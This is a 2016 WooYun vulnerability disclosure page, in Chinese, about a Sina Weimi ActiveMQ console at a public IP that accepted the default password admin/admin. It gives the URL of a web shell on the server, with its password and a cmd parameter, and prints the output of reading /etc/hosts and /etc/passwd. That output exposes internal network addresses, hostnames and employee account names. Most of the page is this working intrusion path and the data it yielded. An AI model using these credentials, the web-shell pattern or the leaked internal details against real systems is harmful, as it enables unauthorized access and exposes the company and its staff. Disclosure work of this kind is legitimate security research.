当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0224381

漏洞标题:新浪微米某系统弱口令getshell/root权限/内网环境

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2016-06-29 13:58

修复时间:2016-07-04 10:30

公开时间:2016-07-04 10:30

漏洞类型:命令执行

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

看到都提给sina了 于是我也跟着众神们的节奏来一发

111.png


http://183.136.160.234:8161/
ActionMQ 弱口令 admin admin

111.png


http://183.136.160.234:8161/admin/test/sex.jsp
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts
应该是直入内网了。。

# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
202.106.184.152 interface.blog.sina.com.cn
10.0.8.32 datacube_mongo
#shequ
10.221.149.246 shequ.dev.weimi.me
#hdfs
#10.0.8.123 wemeetcluster
10.0.8.103 storage.intra.ilianmeng.com
10.0.8.103 test2.live.intra.ilianmeng.com
10.0.8.32 matrix_registry_1
10.0.8.32 matrix_registry_2
10.0.8.32 matrix_registry_3 mongodb_server
10.0.8.32 matrixmc_1 matrixuuid_1
10.0.8.32 matrixmc_2 matrixuuid_2
10.0.8.32 matrixmc_3 matrixuuid_3
10.0.8.32 matrixmc_4 matrixuuid_4
10.0.8.32 matrixdb m_api_db.intra.ilianmeng.com
10.0.8.32 s_api_db.intra.ilianmeng.com
10.0.8.32 matrixredis_1
10.0.8.32 matrixredis_2
10.0.8.32 matrixredis_3
10.0.8.32 matrixredis_4
10.0.8.103 sentinel_host_1
10.0.8.103 sentinel_host_2
10.0.8.32 sentinel_host_3
10.0.8.32 pushserver push.intra.ilianmeng.com
10.0.8.10 node10.intra.hiwemeet.com
10.0.8.32 node11.intra.hiwemeet.com
10.0.8.103 node103.intra.ilianmeng.com img.intra.ilianmeng.com amq.intra.ilianmeng.com searchService neo4j_server search.intra.ilianmeng.com test2.api.intra.ilianmeng.com test2.img.ilianmeng.com test2.img.intra.ilianmeng.com
10.0.8.13 node13.intra.hiwemeet.com
10.0.8.14 node14.intra.hiwemeet.com
10.0.8.2 node2.intra.hiwemeet.com
10.0.8.3 node3.intra.hiwemeet.com
10.0.8.4 node4.intra.hiwemeet.com
10.0.8.5 node5.intra.hiwemeet.com
10.0.8.6 node6.intra.hiwemeet.com
10.0.8.7 node7.intra.hiwemeet.com
10.0.8.8 node8.intra.hiwemeet.com
10.0.8.9 node9.intra.hiwemeet.com
10.0.8.15 salt yum.intra.hiwemeet.com node15.intra.hiwemeet.com statsdserver repo.hiwemeet.com
10.0.8.43 node43.intra.hiwemeet.com baokumc_1 baokumc_2 baokumc_3 baokumc_4 s_api_db.intra.baoku.com m_api_db.intra.baoku.com
10.0.8.44 node44.intra.hiwemeet.com
10.0.8.45 node45.intra.hiwemeet.com
10.0.8.102 node102.intra.hiwemeet.com sub.intra.hiwemeet.com
10.0.8.103 node103.intra.hiwemeet.com sub.intra.ilianmeng.com
10.0.8.102 couchbase115 couchbase116
10.0.8.103 couchbase117 couchbase118
10.0.8.6 redis1.shihui.com
10.0.8.32 s_shihui_db.intra.ilianmeng.com s_shihui_db.intra.hiwemeet.com
10.0.8.32 m_shihui_db.intra.ilianmeng.com m_shihui_db.intra.hiwemeet.com
10.0.8.235 redis2.shihui.com
10.0.8.235 redis3.shihui.com
10.0.8.235 shihuiredis_1
10.0.8.235 shihuiredis_2
10.0.8.235 shihuiredis_3
10.0.8.235 shihuiredis_4
10.0.8.32 shihuimc_1
10.0.8.32 shihuimc_2
10.0.8.32 shihuimc_3
10.0.8.32 shihuimc_4
10.0.8.103 test2.img.intra.ilianmeng.com
10.0.8.103 test2.scorpio.ilianmeng.com
10.0.8.107 static.17shihui.cn
10.0.8.103 api.ilianmeng.com
10.0.8.103 dev.scorpio.ilianmeng.com
10.0.8.32 test2.search.user.db.host search.user.db.host
10.0.8.43 51baokuredis_1
10.0.8.43 51baokuredis_2
10.0.8.43 51baoku_uuid_1
10.0.8.43 51baoku_uuid_2
10.0.8.43 m_db.intra.51baoku.com
10.0.8.43 s_db.intra.51baoku.com


111.png


111.png


http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash


就证明这么多。

漏洞证明:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash

修复方案:

弱口令

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-04 10:30

厂商回复:

请直接提交给微米官方联系修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-06-30 15:16 | 洋葱(乌云厂商)

    弱口令……洋葱占个坑

  2. 2016-06-30 15:27 | j14n ( 普通白帽子 | Rank:2345 漏洞数:421 )

    @洋葱 吃掉你